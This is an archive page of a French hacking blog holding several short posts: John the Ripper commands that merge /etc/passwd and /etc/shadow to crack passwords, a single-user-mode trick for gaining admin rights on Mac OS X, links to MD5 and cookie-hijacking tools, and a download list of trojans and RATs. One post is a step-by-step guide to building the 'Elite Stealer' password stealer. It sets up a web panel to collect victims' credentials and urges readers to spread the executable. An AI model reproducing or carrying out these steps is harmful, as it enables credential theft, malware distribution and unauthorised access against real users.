Archive for 01/01/2012 - 02/01/2012
NirLauncher
NirLauncher, le couteau suisse
Je vous avais déjà présenté (en partie) les produits NirSoft qui permettent de faire tout un tas de choses comme de la récupération de mots de passe, du monitoring de réseau ou des petites choses concernant les browsers, l'audio et la video, Internet, le bureau windows, Office, Oulook, Windows...Etc. Environ une centaine d'outils qui tournent uniquement sous Windows (mes captures écrans ont été faites avec WINE)
Et bien chez Nirsoft, il a eu l'idée d'inventer un NirLauncher qui est en gros un soft regroupant tous ses softs portables et permettant de tout embarquer sur une clé USB sans avoir à se prendre la tête.
Et là où c'est beau, c'est qu'en bidouillant un peu, il est possible d'y intégrer la suite SysInternal qui vient compléter tout ça.
Pour y arriver, il faut télécharger la suite NirLauncher et la décompresser.
Télécharger la suite de SysInternal et la décompresser dans le même répertoire que Nirlauncher
Télécharger le fichier Sysinternal.nlp que NirSoft propose sur son site et de le mettre aussi dans ce même répertoire (Faites un clic droit -> Enregistrer sous)
Puis de lancer NirLauncher.exe, de cliquer sur le manu "Launcher" -> "Add Software Package" et de selectionner le sysinternal.nlp
Ce qui est sympa avec ce petit outil "couteau suisse" c'est que les fichier NLP sont de simples fichiers textes que vous pouvez créer pour vos propres besoin et ainsi intégrer vos propres outils portables (Navigateurs internet portables, antivirus portables, Suite Adobe CS portable... ah nan ça ça n'existe pas... :-) , et ainsi de suite...)
Très pratique !
Article sous licence:
Tag :
Astuce,
Cracker un mot de passe sous Linux ?
Pour trouver le mot de passe linux d'une machine, c'est assez simple mais ça prend du temps... Tout d'abord, il vous faut un petit logiciel open source qui s'appelle John (John The Ripper pour être précis).
La fonction de John est de tester toutes les combinaisons possibles soit d'une liste de mot, soit de manière incrémentale pour faire correspondre le hash du mot de passe crypté avec celui du mot testé.
Bref, vous l'aurez compris, ça peut prendre du temps si le mot de passe est bien long et bien complexe.
Avant de commencer, installez John (méthode Ubuntu ou Debian avec APT) :
sudo apt-get install john
Ensuite, il faut re-assembler les fichiers passwd et shadow... Sous linux, les fichiers contenant les mots de passe sont divisés en 2 et stockés dans le répertoire /etc/
/etc/passwd contient uniquement les logins, les chemins des Home, les groupes...etc mais pas le mot de passe. Ce dernier est quand à lui stocké dans /etc/shadow de façon cryptée.
Donc pour pouvoir cracker ce mot de passe, il faut "re-assembler" les 2 fichiers pour n'en former plus qu'un seul. C'est ce que la command unshadow va nous permettre de faire. Il faut bien sûr être loggé avec un compte administrateur ou root pour pouvoir accèder aux fichiers de /etc/
sudo unshadow /etc/passwd /etc/shadow > mypasswd
Ensuite, il vous suffit de lancer John
sudo john mypasswd
Et c'est parti pour de longues heures si vous avez de la chance (ou des mois et des mois si vous en avez moins)
Une fois que John aura fini son travail, il ne vous restera plus qu'a afficher ce mot de passe avec la commande suivante :
sudo john --show mypasswd
Et voilà... Bon, je vous rappelle quand même que ces petites manipulations ne doivent être réalisées que sur votre propre machine pour tester la sécurité de vos propres mots de passe.
En ce qui concerne John, il est paramétrable dans tous les sens donc si vous voulez aller un peu plus loin dans le truc, je vous recommande ce site.
Article sous licence:Bref, vous l'aurez compris, ça peut prendre du temps si le mot de passe est bien long et bien complexe.
Avant de commencer, installez John (méthode Ubuntu ou Debian avec APT) :
sudo apt-get install john
Ensuite, il faut re-assembler les fichiers passwd et shadow... Sous linux, les fichiers contenant les mots de passe sont divisés en 2 et stockés dans le répertoire /etc/
/etc/passwd contient uniquement les logins, les chemins des Home, les groupes...etc mais pas le mot de passe. Ce dernier est quand à lui stocké dans /etc/shadow de façon cryptée.
Donc pour pouvoir cracker ce mot de passe, il faut "re-assembler" les 2 fichiers pour n'en former plus qu'un seul. C'est ce que la command unshadow va nous permettre de faire. Il faut bien sûr être loggé avec un compte administrateur ou root pour pouvoir accèder aux fichiers de /etc/
sudo unshadow /etc/passwd /etc/shadow > mypasswd
Ensuite, il vous suffit de lancer John
sudo john mypasswd
Et c'est parti pour de longues heures si vous avez de la chance (ou des mois et des mois si vous en avez moins)
Une fois que John aura fini son travail, il ne vous restera plus qu'a afficher ce mot de passe avec la commande suivante :
sudo john --show mypasswd
Et voilà... Bon, je vous rappelle quand même que ces petites manipulations ne doivent être réalisées que sur votre propre machine pour tester la sécurité de vos propres mots de passe.
En ce qui concerne John, il est paramétrable dans tous les sens donc si vous voulez aller un peu plus loin dans le truc, je vous recommande ce site.
Tag :
Hacking,
Devenir admin sur Mac OSX Leopard
Devenir admin sur Mac OSX Leopard
Voici une petite astuce qui vous permettra de devenir administrateur sur un Mac OS X Leopardsans avoir le mot de passe admin (justement !)
Il suffit de démarrer le Mac en mode utilisateur unique, c'est à dire en laissant appuyées les touchesCommande + S lors du boot. Ensuite, montez le disque dur en lecture seule avec les 2 commandes suivantes :
/sbin/fsck -fy
/sbin/mount -uw /
Une fois que c'est fait, nous allons ajouter notre nom d'utilisateur (login) au groupe administrateur de la machine. Pour cela, nous devons démarrer le service "Directory" en tapant la commande :
launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist
Listons les utilisateurs admin en utilisant la commande dscl :
dscl . read groups/admin users
Et si vous ne vous voyez pas dans cette liste, il vous suffit d'entrer la commande suivante pour rajouter votre utilisateur dans le groupe admin (Remplacer "votrelogin" par votre nom d'utilisateur) :
dscl . append groups/admin users votrelogin
Revérifiez que votre pseudo apparait bien dans la liste des users admin :
dscl . read groups/admin users
Et vous n'avez plus qu'à redémarrer votre Mac en tapant la commande
reboot
Vous pourrez ensuite installer ou paramétrer tout ce que vous voudrez sur le Mac !!! Wooh, c'est presque autant sécurisé que Windows et Ubuntu !
[Source]
Tag :
Astuce,
BarWF – Cracker un mot de passe MD5
BarWF – Cracker un mot de passe MD5 à la vitesse de l’éclair !
BarWF est sans doute l'un des crackeur de mot de passe crypté en MD5 les plus rapide. Il utilise le chipset de votre carte graphique et peut bruteforcer un mot de passe sur une GeForce Nvidia 9600GT à une vitesse de 350 000 clés à la seconde.
Ça fonctionne sur des systèmes à base de SSE2 (Pentium 4, Core2duo, Athlon64, Sempron64, Phenom) et c'est optimisé pour les cartes graphiques GTX260, GTX280, 8800GT, 9600GSO, 8800GS, 8800GTS et les Windows 64 bits. (Mais ça marche aussi sur du 32 bits)
Bref, si ça vous intéresse, vous pouvez avoir toutes les infos et télécharger BarWF ici.
Tag :
Hacking,
Cracker n’importe quel compte web 2.0
Cracker n’importe quel compte web 2.0
Robert Graham, le hacker qui a démontré qu'avec un simple sniffer, il pouvait forger des cookies et entrer dans n'importe quel compte de site comme gmail,facebook, yahoo...etc... vient de mettre ses outils en ligne.
Sacré Robert ;-)
Le zip avec les outils et les explications est téléchargeable ici.
Attention à ne pas faire n'importe quoi évidement !
Pour vous protéger, il faut sécuriser la session avec SSL en utilisant https. Voici quelques exemples:
Pour Gmail : Connectez vous à https://mail.google.com/mail/
Pour Yahoo! : Cliquez sur "Sécuriser" sous la zone de mot de passe avant de vous logger.
Pour Hotmail : Cliquez sur "Utiliser une connexion sécurisée" sous la zone de logging.
Source ici et ici
Tag :
Hacking,
Vidéos sur le piratage informatique
Vidéos sur le piratage informatique
L'histoire interdite du piratage informatique
Surveiller ces connexions à Internet
Surveiller ces connexions à Internet:
Pratique de savoir un peu se qui se passe sur votre connexion copmme repérer quelqu'un non autorisé qui utiliserais par exemple le VNC pour faire des choses pas catholique sur votre connexion ou se genre de chose... comment faire...
TCPEye est un petit logiciel qui permet de visualiser l’activité Internet de son ordinateur, programme par programme, connexion par connexion.
Il affiche tous les canaux TCP/IP et les ports UDP ouverts sur votre ordinateur.
Pour chacun d’entre eux, il est possible de connaitre le processus qui l’utilise, depuis quel emplacement (idéal pour débusquer une backdoor planquée), depuis quand et pleins d’autres infos utiles.
Je peux vous dire que quand vous ouvrez ce logiciel, vous prenez peur de voir toute l’activité.
Heureusement, le logiciel permet de stopper immédiatement toute connexion suspecte et de tuer le processus en cours, tout en sauvegardant les informations utiles sous divers formats (XML, HTML, …).
Un vrai must-have de la sécurité.
Le logiciel est compatible avec Windows XP/Vista/7/Server 2003/2008.
Téléchargez TCPEyeTag :
Astuce,
Changez rapidement de serveurs DNS
Changez rapidement de serveurs DNS
Avec toutes ces histoires de blocage de sites par DNS, vous avez pris l’habitude de changer à la main vos serveurs DNS. C’est très bien.
Mais pour vous faciliter la tâche et vous permettre de jongler entre plusieurs serveurs DNS, il existe un petit soft baptisé DNS Jumper qui propose toute une liste de DNS accessibles par tous, et différentes fonctionnalités comme la possibilité d’en rajouter à la main, de rechercher les serveurs DNS qui répondent le plus vite, ou le fameux flush DNS. L’outil est en plusieurs langues dont le français.
DNS Jumper est téléchargeable ici.
source korben
Avec toutes ces histoires de blocage de sites par DNS, vous avez pris l’habitude de changer à la main vos serveurs DNS. C’est très bien.
Mais pour vous faciliter la tâche et vous permettre de jongler entre plusieurs serveurs DNS, il existe un petit soft baptisé DNS Jumper qui propose toute une liste de DNS accessibles par tous, et différentes fonctionnalités comme la possibilité d’en rajouter à la main, de rechercher les serveurs DNS qui répondent le plus vite, ou le fameux flush DNS. L’outil est en plusieurs langues dont le français.
DNS Jumper est téléchargeable ici.
source korben
Tag :
Astuce,
Voleur de mot de passe
Voleur de mot de passe
Voici tutoriel bien expliquer sur la façon de créer un Voleur de mots de passe simplement avec un programme d'aide a la création de l’exécutable malveillant, appeler Elite Stealer , créer par flo.Tutorial Elite Stealer:
Besoin :
- Filezilla
- élite stealer ==>
Code:
http://depositfiles.com/files/jj2wgrisj
- notepad++ ( plus efficace )
- de temps , avec un petit café à la main
1ère étape :
Création d'un site web .
La création de du site, permettre de recevoir les identifiants des victimes
On va prendre comme hébergement www.000webhost.com/ , Inscrivez vous dessus .
Pour le nom de votre site , mettez ce que vous voulez .
surtout prendre la version gratuite ! ==>
Ensuite allez sur View ftp details de votre panneau de config de votre site.
Créer un identifiant , si c'est déjà fais lancez le logiciel filezilla .
Mettez les identifiants de votre ftp ( host + pseudo + mot de passe )
Double cliquez sur le 1er dossier , et commencez par ouvrir le fichier téléchargé précédemment .
Ouvrez IstealerPanelMOD.rar , puis upload ,
puis copier ce qu'il y a à l’intérieur sauf config.php et coller les dans filezilla . ( ouvrir public_html avant , ne surtout pas mettre les fichiers à la racine du ftp )
Patientez un moment!
Ensuite revenez sur votre panneau de config de votre site , puis allez dans Mysql .
Créer un nouveau identifiant ( pour MySQL database name et MySQL user name , rajouter juste un nombre ) puis allez dans phpmyadmin
Cliquez sur import , puis parcourir : cherchez le fichier database.sql dans votre dossier istealerPanelMOD
Puis cliquez sur GO
Ouvrez config.php du dossier upload avec notepad++ ( en faisant clique droit sur le fichier ), et modifier ce qu'il y a à l'interieur , ce qui veux dire :
$dbHost = "localhost"; // MySQL host
Votre host , qui est dans mysql de votre panneau de config ( MySQL Host )
$dbUser = ""; // MySQL username
Le user de la DB (MySQL User)
$dbPass = ""; // MySQL password
Votre mot de passe que vous avez choisi
$dbDatabase = ""; // MySQL database name
Le database name
$username = "loginuser"; // Admin login Username
Choisissez ce que vous voulez ( user )
$password = "loginpw"; // Admin login Password
Choisissez ce que vous voulez ( mot de passe )
$logspage = 100; // Number of logs to display per page
Pour information tout ce qui ce modifie c'est entre les guillemets " "
Sauvegardez ensuite le fichier , et coller le dans votre filezilla au même emplacement que les autre fichiers que vous avez mis précédemment
Le site est maintenant terminé , passons au logiciel .
- Ouvrez elite stealer.exe
- cochez activate php send
- mettez votre site en dessous de " stealer php link "
- Cochez les applications que vous voulez .
- cliquez sur check connection
- Puis cliquez sur build
Voici ce qui va apparaître :
- Cliquez sur continue votre server.exe vient d'apparaître dans votre dossier
Le serveur est maintenant créer , donc il est dans le dossier " élite stealer " sous le nom de " server "
Voila... reste plus cas le propager! cette technique fait beaucoup de victime, alors attention.
Tag :
Hacking,
Trojan
Voici tout de suite la liste alphabétique des "Trojan" que j'ai testé, ainsi qu'une note, basé sur la stabilité , une photo d'écran du client du serveur, et fichier de téléchargement.
- Acid Drop 1.0
- Amitis 1.4.3 beta
- AOL Admin 1.1
- Assassin 1.1
- Assassin 2.0
- Backage 3.1
- Back Door 2.01
- Back Orifice 1.2
- Back Orifice 2000
- Beast 2.06
- Beast 2.07
- Bifrost 1.1
- Bionet 4.05
- Black Core 2.1
- Blade Runner 0.8
- Cia 1.3
- Cold Fusion 1.2
- Cyn 2.1
- Darkmoon 4.1
- Deep Throat 3.1
- Doly 1.7
- DP Trojan 2.5
- Donald Dick 1.52
- Ferat 1.0
- Flux 1.0
- Gate Crasher 1.1
- Ghost 2.3
- Gift 2.1.1
- Girl Griend 1.35
- Hack Attack 2000
- Hackerz Center 3.6
- Hatred Friend 1.3
- Helios Trojan 3.1
- Infector 2.0
- Infector NG 2004
- Jack Trojan 2.0
- Katux 2.0
- Lanfiltrator 1.1 FIX
- Latinus 1.0
- Lithium 1.03
- Mini Command 2.0.3
- Minimo 0.7a
- Mosucker 3.0b
- Netbus 1.7
- Netbus 2.1
- Netsphere 1.31
- Net Devil 1.5
- Nuclear RAT 1.0 beta 6.31
- Optix Pro 1.32
- Optix Pro 1.33
- Opwin 1.1
- Osiris 2.1
- Pest 4.0
- Phase Zero 1.0
- Portal of Doom 3
- Pro RAT 1.8
- Pro RAT 1.9 fix2
- Remote Hack 1.5
- Remote Storm 1.2
- Rewind 1.4
- School Bus 2.0
- Seed 1.1
- Sinique 1.0
- Sockets23 2.5
- Sub Seven 2.2
- Sub Zero
- Tequila Bandita 1.3
- Theef 2.1
- The Thing 1.5
- Trans Scout 1.2
- Undetected 3.3
- Vampire 1.0
- Wincrash 1.3
- Y3k 2.0
= mauvais = bon= excellentZIP est un codage de compression (à ne pas confondre avec "compilation") qui permet de réduire la taille du fichier, et donc gagner du temps pour les transferts. Hors pour pouvoir voir le contenu d'un fichier ZIP, il faut le décompresser (ou décoder) avec un logiciel comme Winzip, dont vous trouverez le lien ici.
Essayer toujours si possible d'utiliser toujours la version exacte du client correspondant à la version du serveur.
Il existe de manière générale de problèmes de compatibilité entre un client et un serveur de versions différentes.
Par exemple, utiliser un client Netbus 1.6 sur un serveur Netbus 2.0 n'a aucune chance de marcher.
Inversement utiliser un client Beast 2.06 sur un serveur Beast 1.91 ne fonctionnera pas non plus, car les mises à jour ont été trop importantes entre les versions 1.91 et 2.06.
Tag :
Hacking,
Articles
